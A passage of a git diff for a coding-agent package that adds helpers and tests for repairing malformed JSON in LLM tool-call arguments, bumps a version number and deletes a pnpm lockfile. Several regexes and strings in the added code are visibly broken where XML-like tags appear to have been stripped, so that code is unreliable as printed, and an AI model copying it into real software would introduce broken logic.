+ * + * @see https://github.com/gsd-build/gsd-2/issues/3403 + */ +export function hasXmlParameterTags(json: string): boolean { + return /<\/?parameter[\s>]/.test(json); +} + +/** + * Detect whether a JSON string contains truncated numeric values + * (e.g. `"exitCode": -,` or `"durationMs": ,`). + * + * Smaller models sometimes emit incomplete numbers when the value + * is cut off mid-generation. + * + * @see https://github.com/gsd-build/gsd-2/issues/3464 + */ +export function hasTruncatedNumbers(json: string): boolean { + // Match: colon, optional whitespace, then a comma or } without a value + // Or: colon, optional whitespace, bare minus sign followed by comma/} + return /:\s*,/.test(json) || /:\s*-\s*[,}]/.test(json); +} + +type XmlParameterBlock = { + name: string; + value: unknown; +}; + +const xmlParameterBlockPattern = /([\s\S]*?)<\/parameter>/g; + +function parseXmlParameterValue(raw: string): unknown { + const trimmed = raw.trim(); + if (trimmed === "") return ""; + try { + return JSON.parse(trimmed); + } catch { + return trimmed; + } +} + +function extractXmlParameterBlocks(text: string): XmlParameterBlock[] { + const blocks: XmlParameterBlock[] = []; + for (const match of text.matchAll(xmlParameterBlockPattern)) { + blocks.push({ + name: match[1], + value: parseXmlParameterValue(match[2] ?? ""), + }); + } + return blocks; +} + +function trimLeakedXmlTail(fieldName: string, value: string): string { + let cut = value.length; + const parameterIndex = value.indexOf("= 0) cut = Math.min(cut, parameterIndex); + + const closingTagIndex = value.indexOf(``); + if (closingTagIndex >= 0) cut = Math.min(cut, closingTagIndex); + + return value.slice(0, cut).trimEnd(); +} + +/** + * Strip XML `` tags from a JSON string, leaving only the + * text content. This handles the case where the LLM mixes XML + * tool-call format into JSON string values. 
+ */ +function stripXmlParameterTags(json: string): string { + // Remove opening tags: + let cleaned = json.replace(//g, ""); + // Remove closing tags: + cleaned = cleaned.replace(/<\/parameter>/g, ""); + return cleaned; +} + +function promoteXmlParametersToTopLevel(json: string): string { + try { + const parsed = JSON.parse(json) as Record; + if (!parsed || typeof parsed !== "object" || Array.isArray(parsed)) { + return stripXmlParameterTags(json); + } + + let changed = false; + for (const [fieldName, value] of Object.entries(parsed)) { + if (typeof value !== "string" || !hasXmlParameterTags(value)) continue; + + const blocks = extractXmlParameterBlocks(value); + if (blocks.length === 0) continue; + + parsed[fieldName] = trimLeakedXmlTail(fieldName, value); + for (const block of blocks) { + if (!(block.name in parsed)) { + parsed[block.name] = block.value; + } + } + changed = true; + } + + return changed ? JSON.stringify(parsed) : stripXmlParameterTags(json); + } catch { + return stripXmlParameterTags(json); + } +} + +/** + * Replace truncated numeric values with 0. + * Handles: `"key": ,` → `"key": 0,` and `"key": -,` → `"key": 0,` + */ +function repairTruncatedNumbers(json: string): string { + // Bare comma after colon (missing value entirely) + let repaired = json.replace(/:\s*,/g, ": 0,"); + // Bare minus sign followed by comma or closing brace + repaired = repaired.replace(/:\s*-\s*([,}])/g, ": 0$1"); + return repaired; +} + +/** + * Attempt to repair malformed JSON in LLM tool-call arguments. + * + * Handles three categories of malformation: + * + * 1. **YAML bullet lists** (#2660): `"key": - item1\n - item2` → `"key": ["item1", "item2"]` + * 2. **XML parameter tags** (#3403): `value` → stripped to content + * 3. **Truncated numbers** (#3464): `"exitCode": -,` → `"exitCode": 0,` + * + * Returns the original string unchanged if no patterns are detected + * or if the repair itself would produce invalid JSON. 
/**
 * Attempt to repair malformed JSON in LLM tool-call arguments.
 *
 * Handles three categories of malformation:
 *
 * 1. **YAML bullet lists** (#2660): `"key": - item1\n - item2` → `"key": ["item1", "item2"]`
 * 2. **XML parameter tags** (#3403): `<parameter name="k">v</parameter>` → promoted/stripped
 * 3. **Truncated numbers** (#3464): `"exitCode": -,` → `"exitCode": 0,`
 *
 * Returns the input unchanged (aside from attempted repairs) when no
 * malformation pattern is detected.
 *
 * @param {string} json - Raw (possibly malformed) tool-call argument string.
 * @returns {string} Best-effort repaired JSON text.
 */
export function repairToolJson(json) {
  let repaired = json;

  // Phase 1: Strip/promote XML parameter tags
  if (hasXmlParameterTags(repaired)) {
    repaired = promoteXmlParametersToTopLevel(repaired);
  }

  // Phase 2: Repair truncated numbers
  if (hasTruncatedNumbers(repaired)) {
    repaired = repairTruncatedNumbers(repaired);
  }

  // Phase 3: Repair YAML bullet lists
  if (!hasYamlBulletLists(repaired)) {
    return repaired;
  }

  // Strategy: find each `"key": - item1\n - item2\n - item3` region and
  // wrap the items in a JSON array.
  //
  // We work on the raw string because the JSON is not parseable yet.
  //
  // Capture groups:
  //   (1) the key portion including the colon,
  //   (2) the bullet-list body,
  //   (3) the separator (optional comma + whitespace) before the next token.
  // The bullet-list body ends at the next `"key":`, a `}`/`]`, or end of string
  // (the terminator is a non-consuming lookahead).
  const keyBulletPattern =
    /("(?:[^"\\]|\\.)*"\s*:\s*)(- .+?)(,?\s*)(?="(?:[^"\\]|\\.)*"\s*:|[}\]]|$)/gs;

  repaired = repaired.replace(
    keyBulletPattern,
    (match, keyPart, bulletBody, separator, offset, source) => {
      // Split the bullet body into individual items on `- ` boundaries.
      // Items may contain embedded newlines for multi-line values.
      const items = bulletBody
        .split(/\n?\s*- /)
        .filter((s) => s.trim().length > 0)
        .map((s) => s.replace(/,\s*$/, "").trim());

      // JSON-encode each item as a string, then wrap in an array.
      const jsonArray = `[${items.map((item) => JSON.stringify(item)).join(", ")}]`;

      // Re-emit the separator so the next key is properly delimited. If the
      // model omitted the comma entirely but another key follows, insert one.
      // BUGFIX: the previous check tested `separator + "x"` for a leading
      // quote, which could never match — the quote of the next key sits past
      // the non-consuming lookahead, not inside the captured separator. Peek
      // at the unconsumed remainder of the source instead.
      let sep = separator;
      if (!separator.includes(",")) {
        const rest = source.slice(offset + match.length);
        sep = /^\s*"/.test(rest) ? ", " : separator;
      }
      return keyPart + jsonArray + sep;
    },
  );

  // Strip trailing commas before } or ] (common in repaired JSON)
  repaired = repaired.replace(/,(\s*[}\]])/g, "$1");

  return repaired;
}
hasYamlBulletLists('"offset": -1'), + false, + "negative number should not be detected as YAML bullet", + ); + }); + + test("hasYamlBulletLists returns false for valid JSON", () => { + assert.equal( + hasYamlBulletLists('{"keyDecisions": ["item1", "item2"]}'), + false, + ); + }); + + // ── Single bullet item ──────────────────────────────────────────────── + + test("repairs single YAML bullet to JSON array", () => { + const malformed = '{"keyDecisions": - Used Web Notification API}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, ["Used Web Notification API"]); + }); + + // ── Multiple bullet items (newline-separated) ───────────────────────── + + test("repairs multiple YAML bullets separated by newlines", () => { + const malformed = + '{"keyDecisions": - Used Web Notification API\n - Chose Tauri over Electron\n - Adopted SQLite for storage, "title": "M005"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, [ + "Used Web Notification API", + "Chose Tauri over Electron", + "Adopted SQLite for storage", + ]); + assert.equal(parsed.title, "M005"); + }); + + // ── Multiple fields with YAML bullets ───────────────────────────────── + + test("repairs multiple fields each with YAML bullet lists", () => { + const malformed = + '{"keyDecisions": - decision one\n - decision two, "keyFiles": - src/lib.rs — Extended menu\n - src/main.ts — Entry point, "title": "done"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.deepEqual(parsed.keyDecisions, ["decision one", "decision two"]); + assert.deepEqual(parsed.keyFiles, [ + "src/lib.rs \u2014 Extended menu", + "src/main.ts \u2014 Entry point", + ]); + assert.equal(parsed.title, "done"); + }); + + // ── Exact reproduction from issue #2660 ─────────────────────────────── + + test("repairs the exact malformed JSON from issue #2660", () 
=> { + const malformed = `{"milestoneId": "M005", "title": "Native Desktop Polish", "oneLiner": "summary", "narrative": "details", "successCriteriaResults": "all pass", "definitionOfDoneResults": "all done", "requirementOutcomes": "met", "keyDecisions": - Used Web Notification API (new window.Notification()) instead of Tauri sendNotification wrapper, "keyFiles": - src-tauri/src/lib.rs \u2014 Extended menu builder with notification toggle, "lessonsLearned": - Always test notification permissions before sending, "followUps": "none", "deviations": "none", "verificationPassed": true}`; + + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + + assert.equal(parsed.milestoneId, "M005"); + assert.equal(parsed.title, "Native Desktop Polish"); + assert.ok(Array.isArray(parsed.keyDecisions), "keyDecisions should be an array"); + assert.ok(parsed.keyDecisions[0].includes("Web Notification API")); + assert.ok(Array.isArray(parsed.keyFiles), "keyFiles should be an array"); + assert.ok(parsed.keyFiles[0].includes("src-tauri/src/lib.rs")); + assert.ok(Array.isArray(parsed.lessonsLearned), "lessonsLearned should be an array"); + assert.equal(parsed.verificationPassed, true); + }); + + // ── Passthrough for valid JSON ──────────────────────────────────────── + + test("returns valid JSON unchanged", () => { + const valid = '{"keyDecisions": ["item1", "item2"], "count": -5}'; + const result = repairToolJson(valid); + assert.equal(result, valid, "valid JSON should be returned unchanged"); + }); + + // ── Negative numbers are preserved ──────────────────────────────────── + + test("does not mangle negative numbers", () => { + const valid = '{"offset": -1, "limit": -100}'; + const result = repairToolJson(valid); + assert.equal(result, valid); + }); +}); + +// ═══════════════════════════════════════════════════════════════════════════ +// XML parameter tag repair (#3403) +// ═══════════════════════════════════════════════════════════════════════════ + 
+describe("repairToolJson — XML parameter tag stripping (#3403)", () => { + test("hasXmlParameterTags detects opening tags", () => { + assert.equal( + hasXmlParameterTags('some text'), + true, + ); + }); + + test("hasXmlParameterTags returns false for clean JSON", () => { + assert.equal( + hasXmlParameterTags('{"narrative": "some text"}'), + false, + ); + }); + + test("strips XML parameter tags from JSON values", () => { + const malformed = '{"sliceId": "S03", "narrative": The slice work}'; + const repaired = repairToolJson(malformed); + // After stripping tags, the content should be parseable or at least tag-free + assert.ok(!repaired.includes(""), "should not contain tags"); + }); + + test("handles mixed XML and JSON content", () => { + const malformed = '{"oneLiner": "done", "verification": all tests pass}'; + const repaired = repairToolJson(malformed); + assert.ok(!repaired.includes(" { + const malformed = + '{"narrative":"text.\\nall tests pass\\n[\\"npm test\\"]","oneLiner":"done"}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + + assert.equal(parsed.narrative, "text."); + assert.equal(parsed.verification, "all tests pass"); + assert.deepEqual(parsed.verificationEvidence, ["npm test"]); + assert.equal(parsed.oneLiner, "done"); + assert.ok(!parsed.narrative.includes(" { + test("hasTruncatedNumbers detects bare comma after colon", () => { + assert.equal(hasTruncatedNumbers('"exitCode": ,'), true); + }); + + test("hasTruncatedNumbers detects bare minus before comma", () => { + assert.equal(hasTruncatedNumbers('"exitCode": -,'), true); + }); + + test("hasTruncatedNumbers detects bare minus before closing brace", () => { + assert.equal(hasTruncatedNumbers('"durationMs": -}'), true); + }); + + test("hasTruncatedNumbers returns false for valid numbers", () => { + assert.equal(hasTruncatedNumbers('"exitCode": 0, "durationMs": 1234'), false); + }); + + test("hasTruncatedNumbers returns false for negative numbers", () => { + 
assert.equal(hasTruncatedNumbers('"exitCode": -1, "offset": -100'), false); + }); + + test("repairs truncated exitCode with bare comma", () => { + const malformed = '{"command": "npm test", "exitCode": , "verdict": "pass", "durationMs": 500}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, 0); + assert.equal(parsed.durationMs, 500); + }); + + test("repairs truncated exitCode with bare minus", () => { + const malformed = '{"command": "npm test", "exitCode": -, "verdict": "pass", "durationMs": 1234}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, 0); + assert.equal(parsed.verdict, "pass"); + }); + + test("repairs truncated durationMs at end of object", () => { + const malformed = '{"command": "npm test", "exitCode": 0, "verdict": "pass", "durationMs": -}'; + const repaired = repairToolJson(malformed); + const parsed = JSON.parse(repaired); + assert.equal(parsed.durationMs, 0); + assert.equal(parsed.exitCode, 0); + }); + + test("does not mangle valid negative numbers", () => { + const valid = '{"exitCode": -1, "offset": -100}'; + const repaired = repairToolJson(valid); + const parsed = JSON.parse(repaired); + assert.equal(parsed.exitCode, -1); + assert.equal(parsed.offset, -100); + }); +}); diff --git a/packages/pi-coding-agent/package.json b/packages/pi-coding-agent/package.json index 7b99a5490..9561c73a4 100644 --- a/packages/pi-coding-agent/package.json +++ b/packages/pi-coding-agent/package.json @@ -1,6 +1,6 @@ { "name": "@gsd/pi-coding-agent", - "version": "2.41.0", + "version": "2.67.0", "description": "Coding agent CLI (vendored from pi-mono)", "type": "module", "piConfig": { diff --git a/packages/pi-coding-agent/pnpm-lock.yaml b/packages/pi-coding-agent/pnpm-lock.yaml deleted file mode 100644 index 32e860496..000000000 --- a/packages/pi-coding-agent/pnpm-lock.yaml +++ /dev/null @@ -1,454 +0,0 @@ -lockfileVersion: '9.0' - 
-settings: - autoInstallPeers: true - excludeLinksFromLockfile: false - -importers: - - .: - dependencies: - '@mariozechner/jiti': - specifier: ^2.6.2 - version: 2.6.5 - '@silvia-odwyer/photon-node': - specifier: ^0.3.4 - version: 0.3.4 - chalk: - specifier: ^5.5.0 - version: 5.6.2 - diff: - specifier: ^8.0.2 - version: 8.0.3 - extract-zip: - specifier: ^2.0.1 - version: 2.0.1 - file-type: - specifier: ^21.1.1 - version: 21.3.2 - glob: - specifier: ^13.0.1 - version: 13.0.6 - hosted-git-info: - specifier: ^9.0.2 - version: 9.0.2 - ignore: - specifier: ^7.0.5 - version: 7.0.5 - marked: - specifier: ^15.0.12 - version: 15.0.12 - minimatch: - specifier: ^10.2.3 - version: 10.2.4 - proper-lockfile: - specifier: ^4.1.2 - version: 4.1.2 - sql.js: - specifier: ^1.14.1 - version: 1.14.1 - strip-ansi: - specifier: ^7.1.0 - version: 7.2.0 - undici: - specifier: ^7.24.2 - version: 7.24.4 - yaml: - specifier: ^2.8.2 - version: 2.8.2 - devDependencies: - '@types/diff': - specifier: ^7.0.2 - version: 7.0.2 - '@types/hosted-git-info': - specifier: ^3.0.5 - version: 3.0.5 - '@types/proper-lockfile': - specifier: ^4.1.4 - version: 4.1.4 - '@types/sql.js': - specifier: ^1.4.9 - version: 1.4.9 - -packages: - - '@borewit/text-codec@0.2.2': - resolution: {integrity: sha512-DDaRehssg1aNrH4+2hnj1B7vnUGEjU6OIlyRdkMd0aUdIUvKXrJfXsy8LVtXAy7DRvYVluWbMspsRhz2lcW0mQ==} - - '@mariozechner/jiti@2.6.5': - resolution: {integrity: sha512-faGUlTcXka5l7rv0lP3K3vGW/ejRuOS24RR2aSFWREUQqzjgdsuWNo/IiPqL3kWRGt6Ahl2+qcDAwtdeWeuGUw==} - hasBin: true - - '@silvia-odwyer/photon-node@0.3.4': - resolution: {integrity: sha512-bnly4BKB3KDTFxrUIcgCLbaeVVS8lrAkri1pEzskpmxu9MdfGQTy8b8EgcD83ywD3RPMsIulY8xJH5Awa+t9fA==} - - '@tokenizer/inflate@0.4.1': - resolution: {integrity: sha512-2mAv+8pkG6GIZiF1kNg1jAjh27IDxEPKwdGul3snfztFerfPGI1LjDezZp3i7BElXompqEtPmoPx6c2wgtWsOA==} - engines: {node: '>=18'} - - '@tokenizer/token@0.3.0': - resolution: {integrity: 
sha512-OvjF+z51L3ov0OyAU0duzsYuvO01PH7x4t6DJx+guahgTnBHkhJdG7soQeTSFLWN3efnHyibZ4Z8l2EuWwJN3A==} - - '@types/diff@7.0.2': - resolution: {integrity: sha512-JSWRMozjFKsGlEjiiKajUjIJVKuKdE3oVy2DNtK+fUo8q82nhFZ2CPQwicAIkXrofahDXrWJ7mjelvZphMS98Q==} - - '@types/emscripten@1.41.5': - resolution: {integrity: sha512-cMQm7pxu6BxtHyqJ7mQZ2kXWV5SLmugybFdHCBbJ5eHzOo6VhBckEgAT3//rP5FwPHNPeEiq4SmQ5ucBwsOo4Q==} - - '@types/hosted-git-info@3.0.5': - resolution: {integrity: sha512-Dmngh7U003cOHPhKGyA7LWqrnvcTyILNgNPmNCxlx7j8MIi54iBliiT8XqVLIQ3GchoOjVAyBzNJVyuaJjqokg==} - - '@types/node@25.5.0': - resolution: {integrity: sha512-jp2P3tQMSxWugkCUKLRPVUpGaL5MVFwF8RDuSRztfwgN1wmqJeMSbKlnEtQqU8UrhTmzEmZdu2I6v2dpp7XIxw==} - - '@types/proper-lockfile@4.1.4': - resolution: {integrity: sha512-uo2ABllncSqg9F1D4nugVl9v93RmjxF6LJzQLMLDdPaXCUIDPeOJ21Gbqi43xNKzBi/WQ0Q0dICqufzQbMjipQ==} - - '@types/retry@0.12.5': - resolution: {integrity: sha512-3xSjTp3v03X/lSQLkczaN9UIEwJMoMCA1+Nb5HfbJEQWogdeQIyVtTvxPXDQjZ5zws8rFQfVfRdz03ARihPJgw==} - - '@types/sql.js@1.4.9': - resolution: {integrity: sha512-ep8b36RKHlgWPqjNG9ToUrPiwkhwh0AEzy883mO5Xnd+cL6VBH1EvSjBAAuxLUFF2Vn/moE3Me6v9E1Lo+48GQ==} - - '@types/yauzl@2.10.3': - resolution: {integrity: sha512-oJoftv0LSuaDZE3Le4DbKX+KS9G36NzOeSap90UIK0yMA/NhKJhqlSGtNDORNRaIbQfzjXDrQa0ytJ6mNRGz/Q==} - - ansi-regex@6.2.2: - resolution: {integrity: sha512-Bq3SmSpyFHaWjPk8If9yc6svM8c56dB5BAtW4Qbw5jHTwwXXcTLoRMkpDJp6VL0XzlWaCHTXrkFURMYmD0sLqg==} - engines: {node: '>=12'} - - balanced-match@4.0.4: - resolution: {integrity: sha512-BLrgEcRTwX2o6gGxGOCNyMvGSp35YofuYzw9h1IMTRmKqttAZZVU67bdb9Pr2vUHA8+j3i2tJfjO6C6+4myGTA==} - engines: {node: 18 || 20 || >=22} - - brace-expansion@5.0.4: - resolution: {integrity: sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==} - engines: {node: 18 || 20 || >=22} - - buffer-crc32@0.2.13: - resolution: {integrity: 
sha512-VO9Ht/+p3SN7SKWqcrgEzjGbRSJYTx+Q1pTQC0wrWqHx0vpJraQ6GtHx8tvcg1rlK1byhU5gccxgOgj7B0TDkQ==} - - chalk@5.6.2: - resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==} - engines: {node: ^12.17.0 || ^14.13 || >=16.0.0} - - debug@4.4.3: - resolution: {integrity: sha512-RGwwWnwQvkVfavKVt22FGLw+xYSdzARwm0ru6DhTVA3umU5hZc28V3kO4stgYryrTlLpuvgI9GiijltAjNbcqA==} - engines: {node: '>=6.0'} - peerDependencies: - supports-color: '*' - peerDependenciesMeta: - supports-color: - optional: true - - diff@8.0.3: - resolution: {integrity: sha512-qejHi7bcSD4hQAZE0tNAawRK1ZtafHDmMTMkrrIGgSLl7hTnQHmKCeB45xAcbfTqK2zowkM3j3bHt/4b/ARbYQ==} - engines: {node: '>=0.3.1'} - - end-of-stream@1.4.5: - resolution: {integrity: sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==} - - extract-zip@2.0.1: - resolution: {integrity: sha512-GDhU9ntwuKyGXdZBUgTIe+vXnWj0fppUEtMDL0+idd5Sta8TGpHssn/eusA9mrPr9qNDym6SxAYZjNvCn/9RBg==} - engines: {node: '>= 10.17.0'} - hasBin: true - - fd-slicer@1.1.0: - resolution: {integrity: sha512-cE1qsB/VwyQozZ+q1dGxR8LBYNZeofhEdUNGSMbQD3Gw2lAzX9Zb3uIU6Ebc/Fmyjo9AWWfnn0AUCHqtevs/8g==} - - file-type@21.3.2: - resolution: {integrity: sha512-DLkUvGwep3poOV2wpzbHCOnSKGk1LzyXTv+aHFgN2VFl96wnp8YA9YjO2qPzg5PuL8q/SW9Pdi6WTkYOIh995w==} - engines: {node: '>=20'} - - get-stream@5.2.0: - resolution: {integrity: sha512-nBF+F1rAZVCu/p7rjzgA+Yb4lfYXrpl7a6VmJrU8wF9I1CKvP/QwPNZHnOlwbTkY6dvtFIzFMSyQXbLoTQPRpA==} - engines: {node: '>=8'} - - glob@13.0.6: - resolution: {integrity: sha512-Wjlyrolmm8uDpm/ogGyXZXb1Z+Ca2B8NbJwqBVg0axK9GbBeoS7yGV6vjXnYdGm6X53iehEuxxbyiKp8QmN4Vw==} - engines: {node: 18 || 20 || >=22} - - graceful-fs@4.2.11: - resolution: {integrity: sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==} - - hosted-git-info@9.0.2: - resolution: {integrity: 
sha512-M422h7o/BR3rmCQ8UHi7cyyMqKltdP9Uo+J2fXK+RSAY+wTcKOIRyhTuKv4qn+DJf3g+PL890AzId5KZpX+CBg==} - engines: {node: ^20.17.0 || >=22.9.0} - - ieee754@1.2.1: - resolution: {integrity: sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==} - - ignore@7.0.5: - resolution: {integrity: sha512-Hs59xBNfUIunMFgWAbGX5cq6893IbWg4KnrjbYwX3tx0ztorVgTDA6B2sxf8ejHJ4wz8BqGUMYlnzNBer5NvGg==} - engines: {node: '>= 4'} - - lru-cache@11.2.7: - resolution: {integrity: sha512-aY/R+aEsRelme17KGQa/1ZSIpLpNYYrhcrepKTZgE+W3WM16YMCaPwOHLHsmopZHELU0Ojin1lPVxKR0MihncA==} - engines: {node: 20 || >=22} - - marked@15.0.12: - resolution: {integrity: sha512-8dD6FusOQSrpv9Z1rdNMdlSgQOIP880DHqnohobOmYLElGEqAL/JvxvuxZO16r4HtjTlfPRDC1hbvxC9dPN2nA==} - engines: {node: '>= 18'} - hasBin: true - - minimatch@10.2.4: - resolution: {integrity: sha512-oRjTw/97aTBN0RHbYCdtF1MQfvusSIBQM0IZEgzl6426+8jSC0nF1a/GmnVLpfB9yyr6g6FTqWqiZVbxrtaCIg==} - engines: {node: 18 || 20 || >=22} - - minipass@7.1.3: - resolution: {integrity: sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==} - engines: {node: '>=16 || 14 >=14.17'} - - ms@2.1.3: - resolution: {integrity: sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==} - - once@1.4.0: - resolution: {integrity: sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==} - - path-scurry@2.0.2: - resolution: {integrity: sha512-3O/iVVsJAPsOnpwWIeD+d6z/7PmqApyQePUtCndjatj/9I5LylHvt5qluFaBT3I5h3r1ejfR056c+FCv+NnNXg==} - engines: {node: 18 || 20 || >=22} - - pend@1.2.0: - resolution: {integrity: sha512-F3asv42UuXchdzt+xXqfW1OGlVBe+mxa2mqI0pg5yAHZPvFmY3Y6drSf/GQ1A86WgWEN9Kzh/WrgKa6iGcHXLg==} - - proper-lockfile@4.1.2: - resolution: {integrity: sha512-TjNPblN4BwAWMXU8s9AEz4JmQxnD1NNL7bNOY/AKUzyamc379FWASUhc/K1pL2noVb+XmZKLL68cjzLsiOAMaA==} - - pump@3.0.4: - resolution: {integrity: 
sha512-VS7sjc6KR7e1ukRFhQSY5LM2uBWAUPiOPa/A3mkKmiMwSmRFUITt0xuj+/lesgnCv+dPIEYlkzrcyXgquIHMcA==} - - retry@0.12.0: - resolution: {integrity: sha512-9LkiTwjUh6rT555DtE9rTX+BKByPfrMzEAtnlEtdEwr3Nkffwiihqe2bWADg+OQRjt9gl6ICdmB/ZFDCGAtSow==} - engines: {node: '>= 4'} - - signal-exit@3.0.7: - resolution: {integrity: sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==} - - sql.js@1.14.1: - resolution: {integrity: sha512-gcj8zBWU5cFsi9WUP+4bFNXAyF1iRpA3LLyS/DP5xlrNzGmPIizUeBggKa8DbDwdqaKwUcTEnChtd2grWo/x/A==} - - std-env@3.10.0: - resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==} - - strip-ansi@7.2.0: - resolution: {integrity: sha512-yDPMNjp4WyfYBkHnjIRLfca1i6KMyGCtsVgoKe/z1+6vukgaENdgGBZt+ZmKPc4gavvEZ5OgHfHdrazhgNyG7w==} - engines: {node: '>=12'} - - strtok3@10.3.4: - resolution: {integrity: sha512-KIy5nylvC5le1OdaaoCJ07L+8iQzJHGH6pWDuzS+d07Cu7n1MZ2x26P8ZKIWfbK02+XIL8Mp4RkWeqdUCrDMfg==} - engines: {node: '>=18'} - - token-types@6.1.2: - resolution: {integrity: sha512-dRXchy+C0IgK8WPC6xvCHFRIWYUbqqdEIKPaKo/AcTUNzwLTK6AH7RjdLWsEZcAN/TBdtfUw3PYEgPr5VPr6ww==} - engines: {node: '>=14.16'} - - uint8array-extras@1.5.0: - resolution: {integrity: sha512-rvKSBiC5zqCCiDZ9kAOszZcDvdAHwwIKJG33Ykj43OKcWsnmcBRL09YTU4nOeHZ8Y2a7l1MgTd08SBe9A8Qj6A==} - engines: {node: '>=18'} - - undici-types@7.18.2: - resolution: {integrity: sha512-AsuCzffGHJybSaRrmr5eHr81mwJU3kjw6M+uprWvCXiNeN9SOGwQ3Jn8jb8m3Z6izVgknn1R0FTCEAP2QrLY/w==} - - undici@7.24.4: - resolution: {integrity: sha512-BM/JzwwaRXxrLdElV2Uo6cTLEjhSb3WXboncJamZ15NgUURmvlXvxa6xkwIOILIjPNo9i8ku136ZvWV0Uly8+w==} - engines: {node: '>=20.18.1'} - - wrappy@1.0.2: - resolution: {integrity: sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==} - - yaml@2.8.2: - resolution: {integrity: sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==} - engines: 
{node: '>= 14.6'} - hasBin: true - - yauzl@2.10.0: - resolution: {integrity: sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==} - - yoctocolors@2.1.2: - resolution: {integrity: sha512-CzhO+pFNo8ajLM2d2IW/R93ipy99LWjtwblvC1RsoSUMZgyLbYFr221TnSNT7GjGdYui6P459mw9JH/g/zW2ug==} - engines: {node: '>=18'} - -snapshots: - - '@borewit/text-codec@0.2.2': {} - - '@mariozechner/jiti@2.6.5': - dependencies: - std-env: 3.10.0 - yoctocolors: 2.1.2 - - '@silvia-odwyer/photon-node@0.3.4': {} - - '@tokenizer/inflate@0.4.1': - dependencies: - debug: 4.4.3 - token-types: 6.1.2 - transitivePeerDependencies: - - supports-color - - '@tokenizer/token@0.3.0': {} - - '@types/diff@7.0.2': {} - - '@types/emscripten@1.41.5': {} - - '@types/hosted-git-info@3.0.5': {} - - '@types/node@25.5.0': - dependencies: - undici-types: 7.18.2 - - '@types/proper-lockfile@4.1.4': - dependencies: - '@types/retry': 0.12.5 - - '@types/retry@0.12.5': {} - - '@types/sql.js@1.4.9': - dependencies: - '@types/emscripten': 1.41.5 - '@types/node': 25.5.0 - - '@types/yauzl@2.10.3': - dependencies: - '@types/node': 25.5.0 - optional: true - - ansi-regex@6.2.2: {} - - balanced-match@4.0.4: {} - - brace-expansion@5.0.4: - dependencies: - balanced-match: 4.0.4 - - buffer-crc32@0.2.13: {} - - chalk@5.6.2: {} - - debug@4.4.3: - dependencies: - ms: 2.1.3 - - diff@8.0.3: {} - - end-of-stream@1.4.5: - dependencies: - once: 1.4.0 - - extract-zip@2.0.1: - dependencies: - debug: 4.4.3 - get-stream: 5.2.0 - yauzl: 2.10.0 - optionalDependencies: - '@types/yauzl': 2.10.3 - transitivePeerDependencies: - - supports-color - - fd-slicer@1.1.0: - dependencies: - pend: 1.2.0 - - file-type@21.3.2: - dependencies: - '@tokenizer/inflate': 0.4.1 - strtok3: 10.3.4 - token-types: 6.1.2 - uint8array-extras: 1.5.0 - transitivePeerDependencies: - - supports-color - - get-stream@5.2.0: - dependencies: - pump: 3.0.4 - - glob@13.0.6: - dependencies: - minimatch: 10.2.4 - minipass: 7.1.3 - path-scurry: 
